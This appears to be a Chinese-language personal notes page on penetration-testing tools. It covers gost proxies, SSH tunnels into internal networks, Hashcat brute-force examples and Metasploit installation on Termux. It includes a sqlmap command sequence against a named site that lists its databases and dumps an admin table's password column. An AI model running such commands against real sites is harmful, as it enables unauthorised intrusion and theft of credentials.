渗透技术

hacking

基于Termux打造Android手机渗透神器

termux hack工具集 | hack - ip tracer

sqlmap简介及其它工具链 | Sqlmap使用详解 | Install Metasploit Framework on Ubuntu 20.04

漏洞测试环境DVWA | hask blog

sqlmap怎么利用注入点暴出数据库

termux proot

破密工具 | HashCat | 密码爆破神器Hashcat | Hashcat Wordlist | xray download | xray Web 扫描

SSH 端口转发

ssh端口转发(跳板机)实战详解

SSH隧道:内网穿透实战

使用Certbot申请和使用Let's Encrypt的SSL证书

gost命令行参数

gost端口转发使用详解

gost

convert socks5 to http proxy
gost -L=http://:8080 -F=socks5://proxy.domain.name:1080
安装SSL证书
#sudo yum install certbot
#sudo systemctl stop nginx
sudo certbot certonly --standalone -d viiv.cc -d www.viiv.cc
#certification dir /etc/letsencrypt/live/

#自动更新证书
#crontab -e
0 0 1 * * /usr/bin/certbot renew --force-renewal
5 0 1 * * /usr/bin/docker restart gost

#wget https://github.com/ginuerzh/gost/releases/download/v2.11.5/gost-linux-amd64-2.11.5.gz
#curl -v "https://www.google.com" --proxy "https://viiv.cc" --proxy-user "usename:passwd"

systemctl stop httpd
systemctl start nginx

#server setting
#vim cmd.sh
DOMAIN="viiv.cc"
USER="username"
PASS="passwd*"
PORT=443
AUTH=$(echo -n ${USER}:${PASS} | base64)

BIND_IP=0.0.0.0
CERT_DIR=/etc/letsencrypt
CERT=${CERT_DIR}/live/${DOMAIN}/fullchain.pem
KEY=${CERT_DIR}/live/${DOMAIN}/privkey.pem
sudo docker run -d --name gost \
    -v ${CERT_DIR}:${CERT_DIR}:ro \
    --net=host ginuerzh/gost \
    -L "http2://${BIND_IP}:${PORT}?auth=${AUTH}&cert=${CERT}&key=${KEY}&probe_resist=web:yzlxxx.com/index.html&knock=www.google.com"


#tunnel setting
#curl -v "https://www.google.com" --proxy "https://viiv.cc" --proxy-user “username:passwd*”
#gost -L ss://aes-256-cfb:080808@:1935 -F https://username:passwd*@viiv.cc:443
nohup gost -L ss://aes-256-cfb:080808@:3389 -F https://username:passwd*@viiv.cc:443 &

ssh tunnels命令

ssh服务器
配置文件/etc/ssh/sshd_config
#默认0,不发送
ClientAliveInterval 60
ClientAliveCountMax 60

#端口转发
GatewayPorts yes
#保持连接
TCPKeepAlive yes

#指定参数
ssh -L 8080:localhost:33062 harttle@mysql.example.com -o TCPKeepAlive=true ServerAliveInterval=60

ssh客户端
配置文件~/.ssh/config
Host *
    ControlPersist yes
    ControlMaster auto
    ControlPath /tmp/sshcontrol-%C
    ControlPersist 1d
    # 以上四条配合使用,实现多条ssh连接共享,而且保持1天内ssh存在。再次执行ssh命令几乎秒连
    TCPKeepAlive=yes
    # 发送空TCP包来保持连接,但是可能被防火墙过滤
    ServerAliveInterval 30
    # 表示每隔多少秒(30秒),从客户端向服务器发送一次心跳(alive检测)
    # 心跳具体格式: debug1: client_input_global_request: rtype keepalive@openssh.com want_reply 1
    ServerAliveCountMax 240 
    # 表示服务端多少次(240次)心跳无响应后, 客户端才会认为与服务器到SSH链接已经断开,然后断开连接。
  
    Port 443

Host *
   ForwardAgent yes
   # 可以讓本地的 SSH Key 在遠端 Server 上進行轉送,也就是经过跳板机Server1,使用本地key访问Server2,不用把key传到Server1上导致泄露
   # 虽然Server1不会获得key,但是可以使用key。所以该选项不宜用于Host *,应该只添加您信任的服务器以及打算用于代理转发的服务器。
   # 注意跳板机需要设置允许代理转发, /etc/ssh/sshd_config 将AllowAgentForwarding的值设置为yes, 并重启服务
   AddKeysToAgent yes
   ForwardX11 yes
   ForwardX11Trusted yes
   Compression yes
   # 压缩,加快数据传输速度
    
服务器端如何将端口绑定到外部地址上
  我们可以把这个映射的端口绑定在0.0.0.0的接口上,方法是加上参数-b 0.0.0.0。
  同时修改SSH服务器端 /etc/sshd_config中 GatewayPorts no为 GatewayPorts yes来打开它。
--------------------------------------------
-L: 本地转发
-D: 动态转发
-R: 远程转发
-f: ssh连接后台运行
-N: 不登录ssh shell

动态转发
ssh -N -D 1088 artink

二级转发
ssh -fN -D 1086 aw0331
ssh -L 1082:localhost:1086 artink

远程转发(curl www.yzl.com:8080访问内网WEBi server)
ssh -N -R 8080:localhost:80 www.yzl.com

同时映射多个端口
ssh -L 8888:www.host.com:80 -L 110:mail.host.com:110 -L 25:mail.host.com:25 user@host -fN 


本地访问外网,配置~/.ssh/config:
Host artink
  User jerry
  HostName 147.112.110.229
  LocalForward 1080 www.example.com:80
运行:
ssh -N artink
相当于:
ssh -N -L 1080:www.example.com:80 artink
本地访问外网:
curl http://localhost:1080

远程转发外网访问内网,配置~/.ssh/config
Host artink
  User jerry
  HostName 147.112.110.229
  RemoteForward 1080 localhost:80
运行:
ssh -N artink
相当于:
ssh -N -R 1080:localhost:80 artink
当前用户访问跳板机artink的web server:
ssh -L 1088:localhost:1080 artink
curl http://artinkIP:1088

SSL VPN穿透(不需要运行VPN)
内网主机:
ssh -fN -R 9022:localhost:9022 art01
穿透主机art01:
ssh -p 9022 localhost


公网穿透
内网主机:
ssh -fN -R *.9022:localhost:9022 art01
穿透主机art01:
ssh -p 9022 localhost

另一台内网主机(第一台内网主机用户名和密码)
ssh -p 9022 artHW -l root

termux hack工具集 | Tool-X - hack tools

使用termux搭建Nmap、Sqlmap、BBScan、subDomainsBrute、Hydra、RouterSploit等 
实现支持端口扫描、注入检测、子域名爆破、多协议弱口令爆破、路由器漏洞检测框架多种功能手机渗透神器。

#Termux 官方移除了如下黑客工具的包支持:
#Hydra
#Metasploit
#Sqlmap
pip install sqlmap

#Hashcat
pkg install proot-distro
proot-distro login ubuntu
pkg update
pkg install hashcat
pkg install sqlmap
pkg install hydra

#hashcat测试
echo -n 23323323 |openssl md5
hashcat -a 3 -m 0 --force '5a745e31dbbd93f4c86d1ef82281688b' '?d?d?d?d?d?d?d?d' -O
echo -n PassWord |openssl md5
hashcat -a 3 -m 0 -1 '?l?u' --force  'a9d402bfcde5792a8b531b3a82669585' '?1?1?1?1?1?1?1?1' -O

#sqlmap测试
检查注入点:
sqlmap -u http://aa.com/star_photo.php?artist_id=11

爆所有数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs

爆当前数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db

指定库名列出所有表
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables

'vhost48330' 为指定数据库名称

指定库名表名列出所有字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
'admin' 为指定表名称

指定库名表名字段dump出指定字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
'ac,id,password' 为指定字段名称


#安装metasploit on ubuntu
apt update
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
msfconsole
db_status
msfdb init

termux hacker tools | metasploit

Could not find rake-13.0.3 in any of the sources
Run `bundle install` to install missing gems.

Could not load OpenSSL.
You must recompile Ruby with OpenSSL support or change the sources in your Gemfile from 'https' to 'http'. Instructions
for compiling with OpenSSL using RVM are available at https://rvm.io/packages/openssl.